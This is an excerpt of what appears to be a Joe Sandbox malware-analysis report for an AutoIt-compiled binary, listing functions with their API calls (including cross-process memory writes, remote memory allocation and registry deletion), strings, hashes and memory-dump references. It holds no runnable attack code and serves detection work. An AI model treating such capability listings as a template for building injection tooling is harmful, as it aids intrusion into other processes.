Opcode Fuzzy Hash: ab8a40620d22f266d203ad9c3ec758681fa09030fbfbf8f7c5d5fceb8204f7f5
Instruction Fuzzy Hash: 0E519DB1900709DBDF25DFA5C981BAAB7F4FF48314F20856EE84ACB251E774AA44CB50

Function 001D97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001D9296,?,?,00000034,00000800,?,00000034), ref: 001E14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001D983F

Part of subcall function 001E1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001D92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 001E14B1

Part of subcall function 001E13DE: GetWindowThreadProcessId.USER32(?,?), ref: 001E1409
Part of subcall function 001E13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,001D925A,00000034,?,?,00001004,00000000,00000000), ref: 001E1419
Part of subcall function 001E13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,001D925A,00000034,?,?,00001004,00000000,00000000), ref: 001E142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001D98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001D98F9

Strings

@, xrefs: 001D9911

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: b21a41c93a7b01ae8a4dd5002c3e77d4e3e9fa289f3dcc54bc142f1ec8e93165
Instruction ID: 2227943ef2ea445ed69e1caaf5eac709dde6ce1fc81a0b89843a41cfa6eda213
Opcode Fuzzy Hash: b21a41c93a7b01ae8a4dd5002c3e77d4e3e9fa289f3dcc54bc142f1ec8e93165
Instruction Fuzzy Hash: 76414C7690021CBECB10DFA4CD86EDEBBB8EB19700F004199FA55B7291DB716E45CBA0

Function 00207946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0020F910,00000000,?,?,?,?), ref: 002079DF
GetWindowLongW.USER32 ref: 002079FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00207A0C

Strings

SysTreeView32, xrefs: 002079B1

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 6f2f3e81ec5271544000394b629a6c73f8631f551be34916d074f9067673fb0a
Instruction ID: 5040970a02f7f7a7b7f93740d7ce2e58a07f3c35900bb454257d4f898cc78db5
Opcode Fuzzy Hash: 6f2f3e81ec5271544000394b629a6c73f8631f551be34916d074f9067673fb0a
Instruction Fuzzy Hash: ED31E13161470AABDB219E38DC45BEB77A9FB09324F204725F875A32E2D731ED618B50

Function 002073D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00207461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00207475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00207499

Strings

SysMonthCal32, xrefs: 0020742C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 5eab09c636f7f01163136a8241a1b53c571f1efc0cb4fee8f4848067664b06a0
Instruction ID: 9d26d78f6578c1889a79ccf496d3d925ad5acef173caa367e960753f1ba20f71
Opcode Fuzzy Hash: 5eab09c636f7f01163136a8241a1b53c571f1efc0cb4fee8f4848067664b06a0
Instruction Fuzzy Hash: 9D21A032510219ABDF218E54CC46FEA3B79EB48724F110214FE156B1D1DAB5A8A18BA0

Function 00207B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00207C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00207C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00207C5F

Strings

msctls_updown32, xrefs: 00207BC4

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 6a7331800dd78195ab5d4469f48a6afc68705c190f7c83ea32b94d6f8d0d9dee
Instruction ID: 9a996ba85da1d15bec6dfe39bc99d88b27ba85580d13c95aa5a8b26e2949b772
Opcode Fuzzy Hash: 6a7331800dd78195ab5d4469f48a6afc68705c190f7c83ea32b94d6f8d0d9dee
Instruction Fuzzy Hash: 5121C1B5614209AFEB10DF28DCC5DA737ECEF5A358B100059F9119B3A2CB31EC618B60

Function 00206CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00206D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00206D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00206D70

Strings

Listbox, xrefs: 00206D08

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: cd8077cb20e168e0cea2a66f9ed0df8bf1852f591e8c543a8679e1247405d190
Instruction ID: 226767121849d6a08878d8cd0cd48ebc96b0d86487d44f05d95661a54a5d5a4d
Opcode Fuzzy Hash: cd8077cb20e168e0cea2a66f9ed0df8bf1852f591e8c543a8679e1247405d190
Instruction Fuzzy Hash: 4E219532620219BFEF118F54DC49FAB3BBAEF89750F018125F9455B1E1C6719C719BA0

Function 001F39E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 001F3A66

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

Strings

AUTOITCALLVARIABLE%d, xrefs: 001F3A58
, $, xrefs: 001F3AA6
%!, xrefs: 001F39F4

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%!
API String ID: 3506404897-2633952502
Opcode ID: a693049d02eb0910206b8e5b83e1b3ebeafbf87e360e1d1b3ea3cac2ee409f87
Instruction ID: 55f078e1bc6b5af8cad59bdd2eecf5e4b7142442aa2a5265d7c9e064a525bd59
Opcode Fuzzy Hash: a693049d02eb0910206b8e5b83e1b3ebeafbf87e360e1d1b3ea3cac2ee409f87
Instruction Fuzzy Hash: 1621CE71600219ABCF10FF65CC82ABEBBB5AF55300F500455F959EB282DB30EA52CFA1

Function 0020770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00207772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00207787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00207794

Strings

msctls_trackbar32, xrefs: 00207749

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 6d3e89ca56ee06acb8e76634287016f9be377cead2bbe83273d7b775daac931a
Instruction ID: 5b197b6e77c5a9973dc8f09bd287145724a3c0d33b413023618797852f8ad007
Opcode Fuzzy Hash: 6d3e89ca56ee06acb8e76634287016f9be377cead2bbe83273d7b775daac931a
Instruction Fuzzy Hash: 3F11E772654309BBEF205F65CC05FD7B76DEF89B54F114228FA41960E1D672E861CB10

Function 001A6B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 001A6B93
__calloc_crt.LIBCMT ref: 001A6BAC

Strings

#, xrefs: 001A6BD1
@B$, xrefs: 001A6BC3

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __calloc_crt
String ID: #$@B$
API String ID: 3494438863-1770436361
Opcode ID: 6d8713eaefde1fa8ebde434dbed2a14d4afd0423ed4e9d528ad130e8d82e84fe
Instruction ID: 777869617ef96408cb0178784160507898e73b9a79041d7d624795cb216700c9
Opcode Fuzzy Hash: 6d8713eaefde1fa8ebde434dbed2a14d4afd0423ed4e9d528ad130e8d82e84fe
Instruction Fuzzy Hash: 05F0FC7E304A218FF768CF54BC55B623794E717330F140017E500CF192EBB0884446E0

Function 001A9B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 001A9B94

Part of subcall function 001A9C0B: __mtinitlocknum.LIBCMT ref: 001A9C1D
Part of subcall function 001A9C0B: EnterCriticalSection.KERNEL32(00000000,?,001A9A7C,0000000D), ref: 001A9C36

__updatetlocinfoEx_nolock.LIBCMT ref: 001A9BA4

Part of subcall function 001A9100: ___addlocaleref.LIBCMT ref: 001A911C
Part of subcall function 001A9100: ___removelocaleref.LIBCMT ref: 001A9127
Part of subcall function 001A9100: ___freetlocinfo.LIBCMT ref: 001A913B

Strings

8#, xrefs: 001A9B85
8#, xrefs: 001A9B8A, 001A9B9F, 001A9BAB

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
String ID: 8#$8#
API String ID: 547918592-2780979153
Opcode ID: 1c0bf57d043eaed5b16a166a4dfe50dcf4b16dc68be0a3a7799b55166f55b6e5
Instruction ID: a899baef142260afa5f3eb3b6e4f5c4bf1811937ce3b8b861c4010f740a6576f
Opcode Fuzzy Hash: 1c0bf57d043eaed5b16a166a4dfe50dcf4b16dc68be0a3a7799b55166f55b6e5
Instruction Fuzzy Hash: E8E0C2B9943300EAEF21FBA47907B5DB660BB53B39F21015AF086550C6CFB084848627

Function 00184C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00184BD0,?,00184DEF,?,002452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00184C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00184C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00184C1D
kernel32.dll, xrefs: 00184C0C

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 900f5015d8fb7f9c5f34d4c9b56d0393a10aaec5463e469b79fd9c8194b9912e
Instruction ID: 32bee364208c405dcf274f2b882527035d44b0c1c633319f90a374dba3a74541
Opcode Fuzzy Hash: 900f5015d8fb7f9c5f34d4c9b56d0393a10aaec5463e469b79fd9c8194b9912e
Instruction Fuzzy Hash: 40D01271561723CFD730AF71DA08606B6D9EF09351B518C399489D6551EBB0D480CB50

Function 00184C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00184B83,?), ref: 00184C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00184C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00184C50
kernel32.dll, xrefs: 00184C3F

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: dcf51f4fbb90b7f40f284f00d40df375baf6c1ac13f590bb8a813ce5d4fd62e2
Instruction ID: 846f2f6fdff080117a5f836761665dea3b34b9ad6ef8b0215fe9b8d1d3d962e9
Opcode Fuzzy Hash: dcf51f4fbb90b7f40f284f00d40df375baf6c1ac13f590bb8a813ce5d4fd62e2
Instruction Fuzzy Hash: 09D01271550713CFD7309F31DA08606B6D8BF05351B518839A499D6561EB70D480CB90

Function 00200DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00201039), ref: 00200DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00200E07

Strings

advapi32.dll, xrefs: 00200DF0
RegDeleteKeyExW, xrefs: 00200E01

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 363661aaf3dcbbd1c0c5112f3f1526c6c2672de7ef7d3911d15eb281d029b071
Instruction ID: 45f2282cd2cf696eda38a2f30d9be2f115633e65f447bcf9321c1da34cdb6e3b
Opcode Fuzzy Hash: 363661aaf3dcbbd1c0c5112f3f1526c6c2672de7ef7d3911d15eb281d029b071
Instruction Fuzzy Hash: 88D017B0560723CFE7219F75D948786B6E5AF06352F518C3E988AE2592E6B0D8E0CA50

Function 001F90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,001F8CF4,?,0020F910), ref: 001F90EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001F9100

Strings

GetModuleHandleExW, xrefs: 001F90FA
kernel32.dll, xrefs: 001F90E9

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: e5cf7d576a7ea1a44f50dc8f92c1cd6fac6f610ebb2757c8f7d2a308c5a48069
Instruction ID: db523420dee45911b408a0ea5ed348fca38922112fe92df351661e60100cf49b
Opcode Fuzzy Hash: e5cf7d576a7ea1a44f50dc8f92c1cd6fac6f610ebb2757c8f7d2a308c5a48069
Instruction Fuzzy Hash: 92D01274664713CFD7309F31D91C616B6D4AF05351B11883A9589D69A0E770C480CA90

Function 001C1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 001C1718
__swprintf.LIBCMT ref: 001C1749

Strings

WIN_XPe, xrefs: 001C1788
%.3d, xrefs: 001C1723

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: d1acaaf6aa9808223cd50629d1fc8e7c3b58effd54720d66eb37ee58e4310ddb
Instruction ID: 9f61602e7f7e1566f5073fab226f9deeb638fd3da1fa2459eb29446ce83b09ae
Opcode Fuzzy Hash: d1acaaf6aa9808223cd50629d1fc8e7c3b58effd54720d66eb37ee58e4310ddb
Instruction Fuzzy Hash: 81D01271884308FAC71997909888EF9737CA72B301F150466B806E2142E331C794EA61

Function 001D717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c3c418aa46916e2717be1ebba884a6dd1c3cb08bb2bb6cd6f756c8fdc51239
Instruction ID: c0affd55382af6d7a94577b09e2503a94f7980537297dcc695d0141eea015747
Opcode Fuzzy Hash: f3c3c418aa46916e2717be1ebba884a6dd1c3cb08bb2bb6cd6f756c8fdc51239
Instruction Fuzzy Hash: 34C15F75A04216EFCB14CF94C884EAEBBB5FF48714B158599E805EB391E730ED81DB90

Function 001FE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 001FE0BE
CharLowerBuffW.USER32(?,?), ref: 001FE101

Part of subcall function 001FD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 001FD7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 001FE301
_memmove.LIBCMT ref: 001FE314

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: e73dcc91e976923afca18d46f1862fd8f851aaf944670f42057b3f0b6df523e8
Instruction ID: 074bd042b040749bdada52d6e3f92b501aa4406cc6b05c72c653a530354137bc
Opcode Fuzzy Hash: e73dcc91e976923afca18d46f1862fd8f851aaf944670f42057b3f0b6df523e8
Instruction Fuzzy Hash: B2C16A71A083059FC714DF28C48096ABBE4FF89718F14896EF9999B361D731EA45CF82

Function 001F8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001F80C3
CoUninitialize.OLE32 ref: 001F80CE

Part of subcall function 001DD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001DD5D4

VariantInit.OLEAUT32(?), ref: 001F80D9
VariantClear.OLEAUT32(?), ref: 001F83AA

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: fceb7b943a32274d8df688cd5290d3285b5039e90a3a47d0dbd54431685ad9f2
Instruction ID: e4ea4f0294261bfe376dbb4a0d1d4a3455beade15e2dac2a46995b288ada4dbe
Opcode Fuzzy Hash: fceb7b943a32274d8df688cd5290d3285b5039e90a3a47d0dbd54431685ad9f2
Instruction Fuzzy Hash: E8A159756047059FDB10EF64C881B2AB7E4BF9A714F084558FA969B3A1CB30FD05CB82

Function 001D687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

